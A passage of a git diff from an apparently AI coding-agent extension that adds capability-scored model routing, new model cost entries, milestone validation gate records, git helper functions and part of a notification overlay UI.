+++ b/src/resources/extensions/gsd/milestone-validation-gates.ts
@@ -0,0 +1,56 @@
+/**
+ * Milestone validation quality gate persistence.
+ *
+ * #2945 Bug 4: validate-milestone was writing VALIDATION.md to disk and
+ * inserting an assessment row, but never persisted structured quality_gates
+ * records in the DB. This module inserts milestone-level validation gates
+ * that correspond to the validation checks performed.
+ *
+ * Gate IDs for milestone validation:
+ *   MV01 — Success criteria checklist
+ *   MV02 — Slice delivery audit
+ *   MV03 — Cross-slice integration
+ *   MV04 — Requirement coverage
+ *
+ * These use the existing quality_gates table with scope "milestone".
+ */
+
+import { _getAdapter } from "./gsd-db.js";
+
+/** Milestone validation gate IDs. */
+const MILESTONE_GATE_IDS = ["MV01", "MV02", "MV03", "MV04"] as const;
+
+/**
+ * Insert milestone-level quality_gates records for a validation run.
+ *
+ * Each gate is inserted with status "complete" and a verdict derived
+ * from the overall milestone validation verdict. Individual gate-level
+ * verdicts are not available (the handler receives a single verdict),
+ * so all gates share the overall verdict.
+ */
+export function insertMilestoneValidationGates(
+  milestoneId: string,
+  sliceId: string,
+  verdict: string,
+  evaluatedAt: string,
+): void {
+  const db = _getAdapter();
+  if (!db) return;
+
+  const gateVerdict = verdict === "pass" ? "pass" : "flag";
+
+  for (const gateId of MILESTONE_GATE_IDS) {
+    db.prepare(
+      `INSERT OR REPLACE INTO quality_gates
+       (milestone_id, slice_id, gate_id, scope, task_id, status, verdict, rationale, findings, evaluated_at)
+       VALUES (:mid, :sid, :gid, 'milestone', '', 'complete', :verdict, :rationale, '', :evaluated_at)`,
+    ).run({
+      ":mid": milestoneId,
+      ":sid": sliceId,
+      ":gid": gateId,
+      ":verdict": gateVerdict,
+      ":rationale": `Milestone validation verdict: ${verdict}`,
+      ":evaluated_at": evaluatedAt,
+    });
+  }
+}
diff --git a/src/resources/extensions/gsd/model-cost-table.ts b/src/resources/extensions/gsd/model-cost-table.ts
index 82be7930d..4c4ebc81c 100644
--- a/src/resources/extensions/gsd/model-cost-table.ts
+++ b/src/resources/extensions/gsd/model-cost-table.ts
@@ -33,10 +33,29 @@ export const BUNDLED_COST_TABLE: ModelCostEntry[] = [
   // OpenAI
   { id: "gpt-4o", inputPer1k: 0.0025, outputPer1k: 0.01, updatedAt: "2025-03-15" },
   { id: "gpt-4o-mini", inputPer1k: 0.00015, outputPer1k: 0.0006, updatedAt: "2025-03-15" },
+  { id: "gpt-4.1", inputPer1k: 0.002, outputPer1k: 0.008, updatedAt: "2026-03-29" },
+  { id: "gpt-4.1-mini", inputPer1k: 0.0004, outputPer1k: 0.0016, updatedAt: "2026-03-29" },
+  { id: "gpt-4.1-nano", inputPer1k: 0.0001, outputPer1k: 0.0004, updatedAt: "2026-03-29" },
+  { id: "gpt-5", inputPer1k: 0.01, outputPer1k: 0.04, updatedAt: "2026-03-29" },
+  { id: "gpt-5-mini", inputPer1k: 0.0003, outputPer1k: 0.0012, updatedAt: "2026-03-29" },
+  { id: "gpt-5-nano", inputPer1k: 0.0001, outputPer1k: 0.0004, updatedAt: "2026-03-29" },
+  { id: "gpt-5-pro", inputPer1k: 0.015, outputPer1k: 0.06, updatedAt: "2026-03-29" },
   { id: "o1", inputPer1k: 0.015, outputPer1k: 0.06, updatedAt: "2025-03-15" },
   { id: "o3", inputPer1k: 0.015, outputPer1k: 0.06, updatedAt: "2025-03-15" },
+  { id: "o4-mini", inputPer1k: 0.005, outputPer1k: 0.02, updatedAt: "2026-03-29" },
+  { id: "o4-mini-deep-research", inputPer1k: 0.005, outputPer1k: 0.02, updatedAt: "2026-03-29" },
   { id: "gpt-4-turbo", inputPer1k: 0.01, outputPer1k: 0.03, updatedAt: "2025-03-15" },
 
+  // OpenAI Codex
+  { id: "gpt-5.1", inputPer1k: 0.005, outputPer1k: 0.02, updatedAt: "2026-03-29" },
+  { id: "gpt-5.1-codex-max", inputPer1k: 0.003, outputPer1k: 0.012, updatedAt: "2026-03-29" },
+  { id: "gpt-5.1-codex-mini", inputPer1k: 0.0003, outputPer1k: 0.0012, updatedAt: "2026-03-29" },
+  { id: "gpt-5.2", inputPer1k: 0.005, outputPer1k: 0.02, updatedAt: "2026-03-29" },
+  { id: "gpt-5.2-codex", inputPer1k: 0.005, outputPer1k: 0.02, updatedAt: "2026-03-29" },
+  { id: "gpt-5.3-codex", inputPer1k: 0.005, outputPer1k: 0.02, updatedAt: "2026-03-29" },
+  { id: "gpt-5.3-codex-spark", inputPer1k: 0.0003, outputPer1k: 0.0012, updatedAt: "2026-03-29" },
+  { id: "gpt-5.4", inputPer1k: 0.005, outputPer1k: 0.02, updatedAt: "2026-03-29" },
+
   // Google
   { id: "gemini-2.0-flash", inputPer1k: 0.0001, outputPer1k: 0.0004, updatedAt: "2025-03-15" },
   { id: "gemini-flash-2.0", inputPer1k: 0.0001, outputPer1k: 0.0004, updatedAt: "2025-03-15" },
diff --git a/src/resources/extensions/gsd/model-router.ts b/src/resources/extensions/gsd/model-router.ts
index fd76d53ca..0efbbf9b6 100644
--- a/src/resources/extensions/gsd/model-router.ts
+++ b/src/resources/extensions/gsd/model-router.ts
@@ -2,7 +2,7 @@
 // Maps complexity tiers to models, enforcing downgrade-only semantics.
 // The user's configured model is always the ceiling.
 
-import type { ComplexityTier, ClassificationResult } from "./complexity-classifier.js";
+import type { ComplexityTier, ClassificationResult, TaskMetadata } from "./complexity-classifier.js";
 import { tierOrdinal } from "./complexity-classifier.js";
 import type { ResolvedModelConfig } from "./preferences.js";
 
@@ -10,6 +10,7 @@ import type { ResolvedModelConfig } from "./preferences.js";
 
 export interface DynamicRoutingConfig {
   enabled?: boolean;
+  capability_routing?: boolean;    // default: false — enable capability profile scoring
   tier_models?: {
     light?: string;
     standard?: string;
@@ -32,6 +33,25 @@ export interface RoutingDecision {
   wasDowngraded: boolean;
   /** Human-readable reason for this decision */
   reason: string;
+  /** How the model was selected */
+  selectionMethod: "tier-only" | "capability-scored";
+  /** Capability scores per eligible model (capability-scored path only) */
+  capabilityScores?: Record<string, number>;
+  /** Task requirement vector used for scoring */
+  taskRequirements?: Partial<Record<string, number>>;
+}
+
+// ─── Capability Profiles ─────────────────────────────────────────────────────
+
+/** Seven-dimension capability profile for a model. All values in 0–100 range. */
+export interface ModelCapabilities {
+  coding: number;
+  debugging: number;
+  research: number;
+  reasoning: number;
+  speed: number;
+  longContext: number;
+  instruction: number;
 }
 
 // ─── Known Model Tiers ───────────────────────────────────────────────────────
@@ -44,6 +64,12 @@ const MODEL_CAPABILITY_TIER: Record<string, ComplexityTier> = {
   "claude-3-5-haiku-latest": "light",
   "claude-3-haiku-20240307": "light",
   "gpt-4o-mini": "light",
+  "gpt-4.1-mini": "light",
+  "gpt-4.1-nano": "light",
+  "gpt-5-mini": "light",
+  "gpt-5-nano": "light",
+  "gpt-5.1-codex-mini": "light",
+  "gpt-5.3-codex-spark": "light",
   "gemini-2.0-flash": "light",
   "gemini-flash-2.0": "light",
 
@@ -52,6 +78,8 @@ const MODEL_CAPABILITY_TIER: Record<string, ComplexityTier> = {
   "claude-sonnet-4-5-20250514": "standard",
   "claude-3-5-sonnet-latest": "standard",
   "gpt-4o": "standard",
+  "gpt-4.1": "standard",
+  "gpt-5.1-codex-max": "standard",
   "gemini-2.5-pro": "standard",
   "deepseek-chat": "standard",
 
@@ -59,8 +87,17 @@ const MODEL_CAPABILITY_TIER: Record<string, ComplexityTier> = {
   "claude-opus-4-6": "heavy",
   "claude-3-opus-latest": "heavy",
   "gpt-4-turbo": "heavy",
+  "gpt-5": "heavy",
+  "gpt-5-pro": "heavy",
+  "gpt-5.1": "heavy",
+  "gpt-5.2": "heavy",
+  "gpt-5.2-codex": "heavy",
+  "gpt-5.3-codex": "heavy",
+  "gpt-5.4": "heavy",
   "o1": "heavy",
   "o3": "heavy",
+  "o4-mini": "heavy",
+  "o4-mini-deep-research": "heavy",
 };
 
 // ─── Cost Table (per 1K input tokens, approximate USD) ───────────────────────
@@ -75,29 +112,229 @@ const MODEL_COST_PER_1K_INPUT: Record<string, number> = {
   "claude-opus-4-6": 0.015,
   "gpt-4o-mini": 0.00015,
   "gpt-4o": 0.0025,
+  "gpt-4.1": 0.002,
+  "gpt-4.1-mini": 0.0004,
+  "gpt-4.1-nano": 0.0001,
+  "gpt-5": 0.01,
+  "gpt-5-mini": 0.0003,
+  "gpt-5-nano": 0.0001,
+  "gpt-5-pro": 0.015,
+  "gpt-5.1": 0.005,
+  "gpt-5.1-codex-max": 0.003,
+  "gpt-5.1-codex-mini": 0.0003,
+  "gpt-5.2": 0.005,
+  "gpt-5.2-codex": 0.005,
+  "gpt-5.3-codex": 0.005,
+  "gpt-5.3-codex-spark": 0.0003,
+  "gpt-5.4": 0.005,
+  "o4-mini": 0.005,
+  "o4-mini-deep-research": 0.005,
   "gemini-2.0-flash": 0.0001,
   "gemini-2.5-pro": 0.00125,
   "deepseek-chat": 0.00014,
 };
 
+// ─── Capability Profiles Data Table ──────────────────────────────────────────
+// Per-model capability profiles (0–100 scale). Used for capability-aware
+// model selection within an eligible tier set.
+
+export const MODEL_CAPABILITY_PROFILES: Record<string, ModelCapabilities> = {
+  "claude-opus-4-6":   { coding: 95, debugging: 90, research: 85, reasoning: 95, speed: 30, longContext: 80, instruction: 90 },
+  "claude-sonnet-4-6": { coding: 85, debugging: 80, research: 75, reasoning: 80, speed: 60, longContext: 75, instruction: 85 },
+  "claude-haiku-4-5":  { coding: 60, debugging: 50, research: 45, reasoning: 50, speed: 95, longContext: 50, instruction: 75 },
+  "gpt-4o":            { coding: 80, debugging: 75, research: 70, reasoning: 75, speed: 65, longContext: 70, instruction: 80 },
+  "gpt-4o-mini":       { coding: 55, debugging: 45, research: 40, reasoning: 45, speed: 90, longContext: 45, instruction: 70 },
+  "gemini-2.5-pro":    { coding: 75, debugging: 70, research: 85, reasoning: 75, speed: 55, longContext: 90, instruction: 75 },
+  "gemini-2.0-flash":  { coding: 50, debugging: 40, research: 50, reasoning: 40, speed: 95, longContext: 60, instruction: 65 },
+  "deepseek-chat":     { coding: 75, debugging: 65, research: 55, reasoning: 70, speed: 70, longContext: 55, instruction: 65 },
+  "o3":                { coding: 80, debugging: 85, research: 80, reasoning: 92, speed: 25, longContext: 70, instruction: 85 },
+};
+
+// ─── Base Task Requirements Data Table ───────────────────────────────────────
+// Per-unit-type base requirement vectors. Weights indicate how important each
+// capability dimension is for this unit type.
+
+export const BASE_REQUIREMENTS: Record<string, Partial<Record<keyof ModelCapabilities, number>>> = {
+  "execute-task":       { coding: 0.9, instruction: 0.7, speed: 0.3 },
+  "research-milestone": { research: 0.9, longContext: 0.7, reasoning: 0.5 },
+  "research-slice":     { research: 0.9, longContext: 0.7, reasoning: 0.5 },
+  "plan-milestone":     { reasoning: 0.9, coding: 0.5 },
+  "plan-slice":         { reasoning: 0.9, coding: 0.5 },
+  "replan-slice":       { reasoning: 0.9, debugging: 0.6, coding: 0.5 },
+  "reassess-roadmap":   { reasoning: 0.9, research: 0.5 },
+  "complete-slice":     { instruction: 0.8, speed: 0.7 },
+  "run-uat":            { instruction: 0.7, speed: 0.8 },
+  "discuss-milestone":  { reasoning: 0.6, instruction: 0.7 },
+  "complete-milestone": { instruction: 0.8, reasoning: 0.5 },
+};
+
 // ─── Public API ──────────────────────────────────────────────────────────────
 
+/**
+ * Score a model's suitability for a task given a requirement vector.
+ * Returns a weighted average of capability dimensions (0–100).
+ * Returns 50 if requirements are empty (neutral score).
+ */
+export function scoreModel(
+  model: ModelCapabilities,
+  requirements: Partial<Record<keyof ModelCapabilities, number>>,
+): number {
+  let weightedSum = 0;
+  let weightSum = 0;
+  for (const [dim, weight] of Object.entries(requirements)) {
+    const capability = model[dim as keyof ModelCapabilities] ?? 50;
+    weightedSum += weight * capability;
+    weightSum += weight;
+  }
+  return weightSum > 0 ? weightedSum / weightSum : 50;
+}
+
+/**
+ * Compute dynamic task requirements from unit type and optional task metadata.
+ * Returns a requirement vector refined by task-specific signals.
+ */
+export function computeTaskRequirements(
+  unitType: string,
+  metadata?: TaskMetadata,
+): Partial<Record<keyof ModelCapabilities, number>> {
+  const base = BASE_REQUIREMENTS[unitType] ?? { reasoning: 0.5 };
+  if (unitType === "execute-task" && metadata) {
+    if (metadata.tags?.some(t => /^(docs?|readme|comment|config|typo|rename)$/i.test(t))) {
+      return { ...base, instruction: 0.9, coding: 0.3, speed: 0.7 };
+    }
+    if (metadata.complexityKeywords?.some(k => k === "concurrency" || k === "compatibility")) {
+      return { ...base, debugging: 0.9, reasoning: 0.8 };
+    }
+    if (metadata.complexityKeywords?.some(k => k === "migration" || k === "architecture")) {
+      return { ...base, reasoning: 0.9, coding: 0.8 };
+    }
+    if ((metadata.fileCount ?? 0) >= 6 || (metadata.estimatedLines ?? 0) >= 500) {
+      return { ...base, coding: 0.9, reasoning: 0.7 };
+    }
+  }
+  return base;
+}
+
+/**
+ * Score all eligible models against a requirement vector and return them
+ * sorted by score descending. Within 2 points: prefer cheaper; equal cost:
+ * lexicographic tie-break by model ID.
+ */
+export function scoreEligibleModels(
+  eligibleModelIds: string[],
+  requirements: Partial<Record<keyof ModelCapabilities, number>>,
+  capabilityOverrides?: Record<string, Partial<ModelCapabilities>>,
+): Array<{ modelId: string; score: number }> {
+  const scored = eligibleModelIds.map(modelId => {
+    const builtin = MODEL_CAPABILITY_PROFILES[modelId];
+    const override = capabilityOverrides?.[modelId];
+    const profile: ModelCapabilities = builtin
+      ? override ? { ...builtin, ...override } : builtin
+      : { coding: 50, debugging: 50, research: 50, reasoning: 50, speed: 50, longContext: 50, instruction: 50 };
+    return { modelId, score: scoreModel(profile, requirements) };
+  });
+  scored.sort((a, b) => {
+    const scoreDiff = b.score - a.score;
+    if (Math.abs(scoreDiff) > 2) return scoreDiff;
+    const costA = MODEL_COST_PER_1K_INPUT[a.modelId] ?? Infinity;
+    const costB = MODEL_COST_PER_1K_INPUT[b.modelId] ?? Infinity;
+    if (costA !== costB) return costA - costB;
+    return a.modelId.localeCompare(b.modelId);
+  });
+  return scored;
+}
+
+/**
+ * Return all models eligible for a given tier, sorted cheapest first.
+ * If routingConfig.tier_models[tier] is set and available, returns only that
+ * model. Otherwise filters availableModelIds by tier from MODEL_CAPABILITY_TIER.
+ */
+export function getEligibleModels(
+  tier: ComplexityTier,
+  availableModelIds: string[],
+  routingConfig: DynamicRoutingConfig,
+): string[] {
+  // 1. Check explicit tier_models config
+  const explicitModel = routingConfig.tier_models?.[tier];
+  if (explicitModel) {
+    // Exact match
+    if (availableModelIds.includes(explicitModel)) return [explicitModel];
+    // Provider-prefix-stripped match
+    const match = availableModelIds.find(id => {
+      const bareAvail = id.includes("/") ? id.split("/").pop()! : id;
+      const bareExplicit = explicitModel.includes("/") ? explicitModel.split("/").pop()! : explicitModel;
+      return bareAvail === bareExplicit;
+    });
+    if (match) return [match];
+  }
+
+  // 2. Auto-detect: filter by tier, sort cheapest first
+  return availableModelIds
+    .filter(id => getModelTier(id) === tier)
+    .sort((a, b) => {
+      const costA = getModelCost(a);
+      const costB = getModelCost(b);
+      return costA - costB;
+    });
+}
+
+/**
+ * Build a fallback chain for a selected model: [selectedModel, ...configuredFallbacks, configuredPrimary]
+ * Deduplicates entries while preserving order.
+ */
+function buildFallbackChain(selectedModelId: string, phaseConfig: ResolvedModelConfig): string[] {
+  return [
+    ...phaseConfig.fallbacks.filter(f => f !== selectedModelId),
+    phaseConfig.primary,
+  ].filter(f => f !== selectedModelId);
+}
+
+/**
+ * Load capability overrides from user preferences' modelOverrides section.
+ * Returns a map of model ID → partial capability overrides to deep-merge with built-in profiles.
+ *
+ * Per D-17: partial capability overrides via models.json modelOverrides, deep-merged with defaults.
+ */
+export function loadCapabilityOverrides(
+  prefs: { modelOverrides?: Record<string, { capabilities?: Partial<ModelCapabilities> }> },
+): Record<string, Partial<ModelCapabilities>> {
+  const result: Record<string, Partial<ModelCapabilities>> = {};
+  if (!prefs.modelOverrides) return result;
+  for (const [modelId, overrideEntry] of Object.entries(prefs.modelOverrides)) {
+    if (overrideEntry.capabilities) {
+      result[modelId] = overrideEntry.capabilities;
+    }
+  }
+  return result;
+}
+
 /**
  * Resolve the model to use for a given complexity tier.
  *
  * Downgrade-only: the returned model is always equal to or cheaper than
  * the user's configured primary model. Never upgrades beyond configuration.
  *
- * @param classification  The complexity classification result
- * @param phaseConfig     The user's configured model for this phase (ceiling)
- * @param routingConfig   Dynamic routing configuration
- * @param availableModelIds  List of available model IDs (from registry)
+ * STEP 1: Filter to eligible models for the requested tier.
+ * STEP 2: Capability scoring — ranks eligible models by task-capability match
+ *         when capability_routing is enabled and multiple eligible models exist.
+ * STEP 3: Fallback chain assembly.
+ *
+ * @param classification      The complexity classification result
+ * @param phaseConfig         The user's configured model for this phase (ceiling)
+ * @param routingConfig       Dynamic routing configuration
+ * @param availableModelIds   List of available model IDs (from registry)
+ * @param unitType            The unit type for capability requirement computation (optional)
+ * @param taskMetadata        Task metadata for refined requirement vectors (optional)
+ * @param capabilityOverrides User-provided capability overrides (deep-merged with built-in profiles, optional)
  */
 export function resolveModelForComplexity(
   classification: ClassificationResult,
   phaseConfig: ResolvedModelConfig | undefined,
   routingConfig: DynamicRoutingConfig,
   availableModelIds: string[],
+  unitType?: string,
+  taskMetadata?: TaskMetadata,
+  capabilityOverrides?: Record<string, Partial<ModelCapabilities>>,
 ): RoutingDecision {
   // If no phase config or routing disabled, pass through
   if (!phaseConfig || !routingConfig.enabled) {
@@ -107,6 +344,7 @@ export function resolveModelForComplexity(
       tier: classification.tier,
       wasDowngraded: false,
       reason: "dynamic routing disabled or no phase config",
+      selectionMethod: "tier-only",
     };
   }
 
@@ -114,6 +352,22 @@ export function resolveModelForComplexity(
   const configuredTier = getModelTier(configuredPrimary);
   const requestedTier = classification.tier;
 
+  // If the configured model is unknown (not in MODEL_CAPABILITY_TIER),
+  // honor the user's explicit choice — don't downgrade based on a guess.
+  // Unknown models default to "heavy" in getModelTier, which makes every
+  // standard/light unit get downgraded to tier_models, silently ignoring
+  // the user's configuration. (#2192)
+  if (!isKnownModel(configuredPrimary)) {
+    return {
+      modelId: configuredPrimary,
+      fallbacks: phaseConfig.fallbacks,
+      tier: requestedTier,
+      wasDowngraded: false,
+      reason: `configured model "${configuredPrimary}" is not in the known tier map — honoring explicit config`,
+      selectionMethod: "tier-only",
+    };
+  }
+
   // Downgrade-only: if requested tier >= configured tier, no change
   if (tierOrdinal(requestedTier) >= tierOrdinal(configuredTier)) {
     return {
@@ -122,18 +376,14 @@ export function resolveModelForComplexity(
       tier: requestedTier,
       wasDowngraded: false,
       reason: `tier ${requestedTier} >= configured ${configuredTier}`,
+      selectionMethod: "tier-only",
     };
   }
 
-  // Find the best model for the requested tier
-  const targetModelId = findModelForTier(
-    requestedTier,
-    routingConfig,
-    availableModelIds,
-    routingConfig.cross_provider !== false,
-  );
+  // STEP 1: Get all eligible models for the requested tier
+  const eligible = getEligibleModels(requestedTier, availableModelIds, routingConfig);
 
-  if (!targetModelId) {
+  if (eligible.length === 0) {
     // No suitable model found — use configured primary
     return {
       modelId: configuredPrimary,
@@ -141,14 +391,37 @@ export function resolveModelForComplexity(
       tier: requestedTier,
       wasDowngraded: false,
       reason: `no ${requestedTier}-tier model available`,
+      selectionMethod: "tier-only",
     };
   }
 
+  // STEP 2: Capability scoring (when enabled and multiple eligible models exist)
+  if (routingConfig.capability_routing !== false && eligible.length > 1 && unitType) {
+    const requirements = computeTaskRequirements(unitType, taskMetadata);
+    const scored = scoreEligibleModels(eligible, requirements, capabilityOverrides);
+    const winner = scored[0];
+    if (winner) {
+      const capScores: Record<string, number> = {};
+      for (const s of scored) capScores[s.modelId] = s.score;
+      const fallbacks = buildFallbackChain(winner.modelId, phaseConfig);
+      return {
+        modelId: winner.modelId,
+        fallbacks,
+        tier: requestedTier,
+        wasDowngraded: true,
+        reason: `capability-scored: ${winner.modelId} (${winner.score.toFixed(1)}) for ${unitType}`,
+        capabilityScores: capScores,
+        taskRequirements: requirements,
+        selectionMethod: "capability-scored",
+      };
+    }
+  }
+
+  // STEP 3: Fallback — use first eligible model (cheapest in tier, or single eligible)
+  const targetModelId = eligible[0];
+
   // Build fallback chain: [downgraded_model, ...configured_fallbacks, configured_primary]
-  const fallbacks = [
-    ...phaseConfig.fallbacks.filter(f => f !== targetModelId),
-    configuredPrimary,
-  ].filter(f => f !== targetModelId);
+  const fallbacks = buildFallbackChain(targetModelId, phaseConfig);
 
   return {
     modelId: targetModelId,
@@ -156,6 +429,7 @@ export function resolveModelForComplexity(
     tier: requestedTier,
     wasDowngraded: true,
     reason: classification.reason,
+    selectionMethod: "tier-only",
   };
 }
 
@@ -176,7 +450,8 @@ export function escalateTier(currentTier: ComplexityTier): ComplexityTier | null
  */
 export function defaultRoutingConfig(): DynamicRoutingConfig {
   return {
-    enabled: false,
+    enabled: true,
+    capability_routing: true,
     escalate_on_failure: true,
     budget_pressure: true,
     cross_provider: true,
@@ -198,45 +473,18 @@ function getModelTier(modelId: string): ComplexityTier {
     if (bareId.includes(knownId) || knownId.includes(bareId)) return tier;
   }
 
-  // Unknown models are assumed heavy (safest assumption)
-  return "heavy";
+  // Unknown models are assumed standard (per D-15: avoids silently ignoring user config)
+  return "standard";
 }
 
-function findModelForTier(
-  tier: ComplexityTier,
-  config: DynamicRoutingConfig,
-  availableModelIds: string[],
-  crossProvider: boolean,
-): string | null {
-  // 1. Check explicit tier_models config
-  const explicitModel = config.tier_models?.[tier];
-  if (explicitModel && availableModelIds.includes(explicitModel)) {
-    return explicitModel;
+/** Check if a model ID has a known capability tier mapping. (#2192) */
+function isKnownModel(modelId: string): boolean {
+  const bareId = modelId.includes("/") ? modelId.split("/").pop()! : modelId;
+  if (MODEL_CAPABILITY_TIER[bareId]) return true;
+  for (const knownId of Object.keys(MODEL_CAPABILITY_TIER)) {
+    if (bareId.includes(knownId) || knownId.includes(bareId)) return true;
   }
-  // Also check with provider prefix stripped
-  if (explicitModel) {
-    const match = availableModelIds.find(id => {
-      const bareAvail = id.includes("/") ? id.split("/").pop()! : id;
-      const bareExplicit = explicitModel.includes("/") ? explicitModel.split("/").pop()! : explicitModel;
-      return bareAvail === bareExplicit;
-    });
-    if (match) return match;
-  }
-
-  // 2. Auto-detect: find the cheapest available model in the requested tier
-  const candidates = availableModelIds
-    .filter(id => {
-      const modelTier = getModelTier(id);
-      return modelTier === tier;
-    })
-    .sort((a, b) => {
-      if (!crossProvider) return 0;
-      const costA = getModelCost(a);
-      const costB = getModelCost(b);
-      return costA - costB;
-    });
-
-  return candidates[0] ?? null;
+  return false;
 }
 
 function getModelCost(modelId: string): number {
diff --git a/src/resources/extensions/gsd/native-git-bridge.ts b/src/resources/extensions/gsd/native-git-bridge.ts
index ab2361296..ad126332a 100644
--- a/src/resources/extensions/gsd/native-git-bridge.ts
+++ b/src/resources/extensions/gsd/native-git-bridge.ts
@@ -58,6 +58,8 @@ interface GitBatchInfo {
 interface GitMergeResult {
   success: boolean;
   conflicts: string[];
+  /** Filenames extracted from git stderr when a dirty working tree blocks the merge (#2151). */
+  dirtyFiles?: string[];
 }
 
 // ─── Native Module Loading ──────────────────────────────────────────────────
@@ -678,6 +680,16 @@ export function nativeAddAll(basePath: string): void {
   gitFileExec(basePath, ["add", "-A"]);
 }
 
+/**
+ * Stage only already-tracked files (git add -u).
+ * Does NOT add new untracked files — only updates modifications and deletions
+ * for files git already knows about. Safe for automated snapshots where
+ * pulling in unknown untracked files (secrets, binaries) would be dangerous.
+ */
+export function nativeAddTracked(basePath: string): void {
+  gitFileExec(basePath, ["add", "-u"]);
+}
+
 /**
  * Stage all files with pathspec exclusions (git add -A -- ':!pattern' ...).
  * Excluded paths are never hashed by git, preventing hangs on large
@@ -712,10 +724,12 @@ export function nativeAddAllWithExclusions(basePath: string, exclusions: readonl
       return;
     }
     // When .gsd is a symlink, git rejects `:!.gsd/...` pathspecs with
-    // "beyond a symbolic link". Fall back to plain `git add -A` which
-    // respects .gitignore (where .gsd/ is listed by default).
+    // "beyond a symbolic link". Fall back to `git add -u` which only
+    // stages changes to already-tracked files — O(tracked) not O(filesystem).
+    // Using `git add -A` here would traverse the entire working tree,
+    // hanging indefinitely on repos with large untracked data dirs. (#1977)
     if (stderr.includes("beyond a symbolic link")) {
-      nativeAddAll(basePath);
+      gitFileExec(basePath, ["add", "-u"]);
       return;
     }
     throw new GSDError(GSD_GIT_ERROR, `git add -A with exclusions failed in ${basePath}: ${getErrorMessage(err)}`);
@@ -847,6 +861,7 @@ export function nativeMergeSquash(basePath: string, branch: string): GitMergeRes
       cwd: basePath,
       stdio: ["ignore", "pipe", "pipe"],
       encoding: "utf-8",
+      env: GIT_NO_PROMPT_ENV,
     });
     return { success: true, conflicts: [] };
   } catch (err: unknown) {
@@ -862,7 +877,16 @@ export function nativeMergeSquash(basePath: string, branch: string): GitMergeRes
       stderr.includes("not possible because you have unmerged files") ||
       stderr.includes("overwritten by merge")
     ) {
-      return { success: false, conflicts: ["__dirty_working_tree__"] };
+      // Extract filenames from git stderr so callers can report which files
+      // are dirty instead of generically blaming .gsd/ (#2151).
+      // Git lists them as tab-indented lines between the "would be overwritten"
+      // header and the "Please commit" footer.
+      const dirtyFiles = stderr
+        .split("\n")
+        .filter((line) => line.startsWith("\t"))
+        .map((line) => line.trim())
+        .filter(Boolean);
+      return { success: false, conflicts: ["__dirty_working_tree__"], dirtyFiles };
     }
 
     // Check for real content conflicts
@@ -919,6 +943,37 @@ export function nativeResetHard(basePath: string): void {
   execSync("git reset --hard HEAD", { cwd: basePath, stdio: "pipe" });
 }
 
+/**
+ * Soft reset to a target ref (git reset --soft <ref>).
+ * Moves HEAD to `target` while keeping all changes staged in the index.
+ * Used to squash snapshot commits back into a single real commit.
+ */
+export function nativeResetSoft(basePath: string, target: string): void {
+  execFileSync("git", ["reset", "--soft", target], {
+    cwd: basePath,
+    stdio: ["ignore", "pipe", "pipe"],
+    encoding: "utf-8",
+    env: GIT_NO_PROMPT_ENV,
+  });
+}
+
+/**
+ * Get the subject line of a commit (git log -1 --format=%s <ref>).
+ * Returns empty string if the ref doesn't exist.
+ */
+export function nativeCommitSubject(basePath: string, ref: string): string {
+  try {
+    return execFileSync("git", ["log", "-1", "--format=%s", ref], {
+      cwd: basePath,
+      stdio: ["ignore", "pipe", "pipe"],
+      encoding: "utf-8",
+      env: GIT_NO_PROMPT_ENV,
+    }).trim();
+  } catch {
+    return "";
+  }
+}
+
 /**
  * Delete a branch.
  * Native: libgit2 branch delete.
diff --git a/src/resources/extensions/gsd/notification-overlay.ts b/src/resources/extensions/gsd/notification-overlay.ts
new file mode 100644
index 000000000..1b5e3bec5
--- /dev/null
+++ b/src/resources/extensions/gsd/notification-overlay.ts
@@ -0,0 +1,295 @@
+// GSD Extension — Notification History Overlay
+// Scrollable panel showing all persisted notifications with severity filtering.
+// Toggled with Ctrl+Alt+N (⌃⌥N on macOS) or opened from /gsd notifications.
+
+import type { Theme } from "@gsd/pi-coding-agent";
+import { truncateToWidth, visibleWidth, matchesKey, Key } from "@gsd/pi-tui";
+
+import {
+  readNotifications,
+  markAllRead,
+  clearNotifications,
+  getUnreadCount,
+  type NotificationEntry,
+  type NotifySeverity,
+} from "./notification-store.js";
+import { padRight, centerLine, joinColumns, formatDuration } from "../shared/mod.js";
+
+type FilterMode = "all" | "error" | "warning" | "info";
+const FILTER_CYCLE: FilterMode[] = ["all", "error", "warning", "info"];
+
+function severityIcon(severity: NotifySeverity): string {
+  switch (severity) {
+    case "error": return "✗";
+    case "warning": return "⚠";
+    case "success": return "✓";
+    case "info":
+    default: return "●";
+  }
+}
+
+/** Word-wrap plain text to fit within maxWidth columns. */
+function wrapText(text: string, maxWidth: number): string[] {
+  if (text.length <= maxWidth) return [text];
+  const words = text.split(/\s+/);
+  const lines: string[] = [];
+  let current = "";
+  for (const word of words) {
+    if (current.length === 0) {
+      current = word;
+    } else if (current.length + 1 + word.length <= maxWidth) {
+      current += " " + word;
+    } else {
+      lines.push(current);
+      current = word;
+    }
+  }
+  if (current.length > 0) lines.push(current);
+  // If a single word exceeds maxWidth, truncate it
+  return lines.map((l) => l.length > maxWidth ? l.slice(0, maxWidth - 1) + "…" : l);
+}
+
+function formatTimestamp(ts: string): string {
+  try {
+    const d = new Date(ts);
+    const now = Date.now();
+    const diffMs = now - d.getTime();
+    if (diffMs < 60_000) return "just now";
+    if (diffMs < 3600_000) return `${Math.floor(diffMs / 60_000)}m ago`;
+    if (diffMs < 86400_000) return `${Math.floor(diffMs / 3600_000)}h ago`;
+    return `${Math.floor(diffMs / 86400_000)}d ago`;
+  } catch {
+    return ts.slice(11, 19); // fallback: HH:MM:SS
+  }
+}
+
+export class GSDNotificationOverlay {
+  private tui: { requestRender: () => void };
+  private theme: Theme;
+  private onClose: () => void;
+  private cachedWidth?: number;
+  private cachedLines?: string[];
+  private scrollOffset = 0;
+  private filterIndex = 0;
+  private entries: NotificationEntry[] = [];
+  private refreshTimer: ReturnType<typeof setInterval>;
+  private disposed = false;
+  private resizeHandler: (() => void) | null = null;
+
+  constructor(
+    tui: { requestRender: () => void },
+    theme: Theme,
+    onClose: () => void,
+  ) {
+    this.tui = tui;
+    this.theme = theme;
+    this.onClose = onClose;
+
+    // Mark all as read on open
+    markAllRead();
+    this.entries = readNotifications();
+
+    // Resize handler
+    this.resizeHandler = () => {
+      if (this.disposed) return;
+      this.invalidate();
+      this.tui.requestRender();
+    };
+    process.stdout.on("resize", this.resizeHandler);
+
+    // Refresh every 3s for new notifications
+    this.refreshTimer = setInterval(() => {
+      if (this.disposed) return;
+      const fresh = readNotifications();
+      if (fresh.length !== this.entries.length) {
+        this.entries = fresh;
+        markAllRead();
+        this.invalidate();
